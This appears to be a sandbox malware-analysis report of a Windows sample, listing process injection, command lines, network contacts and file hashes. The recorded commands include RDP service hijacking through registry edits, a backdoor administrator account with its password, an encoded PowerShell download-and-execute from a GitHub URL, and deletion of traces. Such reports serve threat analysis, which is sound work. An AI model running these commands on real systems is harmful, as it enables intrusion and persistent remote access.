Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4796 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4796 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 5104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4936 wrote to memory of 5104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5104 wrote to memory of 3268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5104 wrote to memory of 3268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4936 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 4104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4936 wrote to memory of 4104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4104 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4104 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4936 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4936 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3604 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3604 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3708 wrote to memory of 2884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3708 wrote to memory of 2884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2884 wrote to memory of 4260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2884 wrote to memory of 4260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4936 wrote to memory of 740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4936 wrote to memory of 740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3848 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3848 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3940 wrote to memory of 3440 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3940 wrote to memory of 3440 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4264 wrote to memory of 3684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4264 wrote to memory of 3684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3684 wrote to memory of 4496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3684 wrote to memory of 4496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 812 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 812 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1396 wrote to memory of 1524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1396 wrote to memory of 1524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1808 wrote to memory of 1040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1808 wrote to memory of 1040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1040 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1040 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2500 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2500 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3240 wrote to memory of 3632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3240 wrote to memory of 3632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4064 wrote to memory of 4068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4064 wrote to memory of 4068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4068 wrote to memory of 3496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4068 wrote to memory of 3496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2352 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2352 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2844 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2844 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2080 wrote to memory of 4556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2080 wrote to memory of 4556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES970B.tmp" "c:\Users\Admin\AppData\Local\Temp\5drmgc1n\CSCB94FCE7A99CF424194347C4E4E2EB2.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 6letaiCK /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 6letaiCK /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 6letaiCK /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 6letaiCK

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 6letaiCK

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 6letaiCK

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 52.109.8.20:443 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speedtest.claranet.nl udp
NL 212.61.188.174:8080 speedtest.claranet.nl tcp
US 8.8.8.8:53 speedtest.pixelhosting.nl udp
NL 185.226.74.48:8080 speedtest.pixelhosting.nl tcp
US 8.8.8.8:53 speedtest.init3.nl udp
NL 185.161.141.201:8080 speedtest.init3.nl tcp
US 8.8.8.8:53 sp1.jonaz.nl udp
NL 185.47.134.254:8080 sp1.jonaz.nl tcp
US 8.8.8.8:53 asfggagsa3.xyz udp

Files

memory/4796-114-0x0000020AF8150000-0x0000020AF854F000-memory.dmp

memory/4796-117-0x0000020AF7D33000-0x0000020AF7D35000-memory.dmp

memory/4796-118-0x0000020AF7D35000-0x0000020AF7D36000-memory.dmp

memory/4796-116-0x0000020AF7D30000-0x0000020AF7D32000-memory.dmp

memory/4796-119-0x0000020AF7D36000-0x0000020AF7D37000-memory.dmp

memory/4936-120-0x0000000000000000-mapping.dmp

memory/4936-126-0x000002C66C2D0000-0x000002C66C2D1000-memory.dmp

memory/4936-129-0x000002C66C320000-0x000002C66C322000-memory.dmp

memory/4936-130-0x000002C66CD40000-0x000002C66CD41000-memory.dmp

memory/4936-131-0x000002C66C323000-0x000002C66C325000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/5104-137-0x0000000000000000-mapping.dmp

memory/4936-138-0x000002C66C326000-0x000002C66C328000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.cmdline

MD5 6847ea95f6502b5e247c4c9b15e7c550
SHA1 14560fa98b580e2bc61b540e882c4b189baa0548
SHA256 96af6a8c1909ba1870812eb4b50f7b5d1932393497ee0377e9304b33e2c91ac8
SHA512 c3123f104c73ef6d14a0fddd687df65b94b5b0f34b2385587ac7d52b90757d6c0c28dc4ec3a015837d52b10b58d0418877b0951d0d9f8a6b0a0459c600ab8abb

\??\c:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/3268-141-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\5drmgc1n\CSCB94FCE7A99CF424194347C4E4E2EB2.TMP

MD5 848d49df70c48d0288cfed3e85b84033
SHA1 99d4922beb8d64ec5490aab9a79143f5666b79c8
SHA256 aa548d2b29250898debf642a921ad659d2f031f2dc27214da9342f2605d0a6f4
SHA512 e9f71be7fd42a84857088bf8e72b7e7aa40976178ff407eab35da865b9ee80ea645a773ab77e5b8285242d7491f73b67036d6d4688d7311440df3124a0d98c4f

C:\Users\Admin\AppData\Local\Temp\RES970B.tmp

MD5 43c612824034d372a2147adde8e768d0
SHA1 603eff8d1f3ea00ae0836e0a9f46c671fc312811
SHA256 28624f6137cc35cfd2fd921ff4ee270f94cd027a975cc0074ef21871d3768b3d
SHA512 60344a7dbcf8b1c2c5cfc2cc5d1c7ef76a8a194db7f228bb2cec0ac4311837f95ee38d6396ce9d0952fef247d8e3a173539095d72ec29992a46e424ee4193be9

C:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.dll

MD5 8f1a77661d61dd4da6640eef43a23b8b
SHA1 5f5a64847dc0b47fc04e6d2f8bde97f021f03944
SHA256 52e29a6a3b4fe12c23d2c057f0228ccf720d50615a17bbcc3bba9fd11dd8bd59
SHA512 2588459bdf58e4ca34e1f07b21c7d7bc642d3ffb6c408f7cfccddb0b4e0d4bcd5d4802bbb28645ab17622ad95fa3d713ba1c9970680a40002fe7968a3946097d

memory/4936-145-0x000002C66C300000-0x000002C66C301000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9d21abc1a799ae0ea31258d563532295
SHA1 a9cde90ba328e30a3eb7a5c410b304a4ae09cdba
SHA256 8075e676d039b5791405f3ab00787a16199920dfe025ff04359b953565bf6f2f
SHA512 b9324c8b4af372a89aaa8c864dab88e74fdd820b28b6fe03897151e23de01b0a0857959e0e023340e4dd18ba0a6dad2faaf365580769b3a473070457b72b3065

memory/4936-149-0x000002C66C328000-0x000002C66C329000-memory.dmp

memory/4936-152-0x000002C66D310000-0x000002C66D311000-memory.dmp

memory/4936-153-0x000002C66D6A0000-0x000002C66D6A1000-memory.dmp

memory/3392-160-0x0000000000000000-mapping.dmp

memory/3392-166-0x00000230F2930000-0x00000230F2932000-memory.dmp

memory/3392-168-0x00000230F2933000-0x00000230F2935000-memory.dmp

memory/3392-176-0x00000230F2936000-0x00000230F2938000-memory.dmp

memory/416-205-0x0000000000000000-mapping.dmp

memory/3392-215-0x00000230F2938000-0x00000230F293A000-memory.dmp

memory/416-218-0x0000027676463000-0x0000027676465000-memory.dmp

memory/416-216-0x0000027676460000-0x0000027676462000-memory.dmp

memory/1100-246-0x0000000000000000-mapping.dmp

memory/416-257-0x0000027676466000-0x0000027676468000-memory.dmp

memory/416-258-0x0000027676468000-0x000002767646A000-memory.dmp

memory/1100-259-0x000002477A720000-0x000002477A722000-memory.dmp

memory/1100-260-0x000002477A723000-0x000002477A725000-memory.dmp

memory/1100-290-0x000002477A726000-0x000002477A728000-memory.dmp

memory/1100-291-0x000002477A728000-0x000002477A72A000-memory.dmp

memory/4716-307-0x0000000000000000-mapping.dmp

memory/3344-308-0x0000000000000000-mapping.dmp

memory/3340-309-0x0000000000000000-mapping.dmp

memory/4104-346-0x0000000000000000-mapping.dmp

memory/1008-347-0x0000000000000000-mapping.dmp

memory/3604-350-0x0000000000000000-mapping.dmp

memory/3708-351-0x0000000000000000-mapping.dmp

memory/2884-352-0x0000000000000000-mapping.dmp

memory/4260-353-0x0000000000000000-mapping.dmp

memory/740-354-0x0000000000000000-mapping.dmp

memory/3848-355-0x0000000000000000-mapping.dmp

memory/3940-356-0x0000000000000000-mapping.dmp

memory/3440-357-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 2997902dba8aefe9e872b14c2bfb584b
SHA1 cca608ebdde64a12dca56b2bd4864089857eba01
SHA256 537ab9c5f678410f21c063f11f4a894cc15025a5590199716a01bbf365dc0e50
SHA512 4fc959cbf5bebfcb5a32fdebd2ceec8943f9d3d0ffcaed236b2d73b680c5c5f6c85d5ad3d192d7d565f4b2fe07fb87321a8036a304147df2b7f45936ff5f9fc1

\Windows\Branding\mediasvc.png

MD5 9119f61ba0d487585a8fd5aaa4198a9a
SHA1 1ff2e337e5d1547d9e1824062500f743aae999db
SHA256 6a3da788a78fc2024fbfb135624047a7d15edcae3798a3cb0e87fbab740d70f1
SHA512 322e3e0006a3015c0495b76bdf9125285e6a6dd2f84d69996e4d95cbc73449269b7945ccccad465d417394075bc69f46f91ad1eb95f717958977cb88139267ab

memory/3684-360-0x0000000000000000-mapping.dmp

memory/4496-361-0x0000000000000000-mapping.dmp

memory/1396-362-0x0000000000000000-mapping.dmp

memory/1524-363-0x0000000000000000-mapping.dmp

memory/1040-364-0x0000000000000000-mapping.dmp

memory/580-365-0x0000000000000000-mapping.dmp

memory/3240-366-0x0000000000000000-mapping.dmp

memory/3632-367-0x0000000000000000-mapping.dmp

memory/4068-368-0x0000000000000000-mapping.dmp

memory/3496-369-0x0000000000000000-mapping.dmp

memory/2844-370-0x0000000000000000-mapping.dmp

memory/4076-371-0x0000000000000000-mapping.dmp

memory/4556-372-0x0000000000000000-mapping.dmp

memory/5052-373-0x0000000000000000-mapping.dmp

memory/5068-374-0x0000000000000000-mapping.dmp

memory/5068-387-0x000001FA79DE3000-0x000001FA79DE5000-memory.dmp

memory/5068-386-0x000001FA79DE0000-0x000001FA79DE2000-memory.dmp

memory/5068-390-0x000001FA79DE6000-0x000001FA79DE8000-memory.dmp

memory/5068-429-0x000001FA79DE8000-0x000001FA79DE9000-memory.dmp

memory/1216-442-0x0000000000000000-mapping.dmp

memory/1828-443-0x0000000000000000-mapping.dmp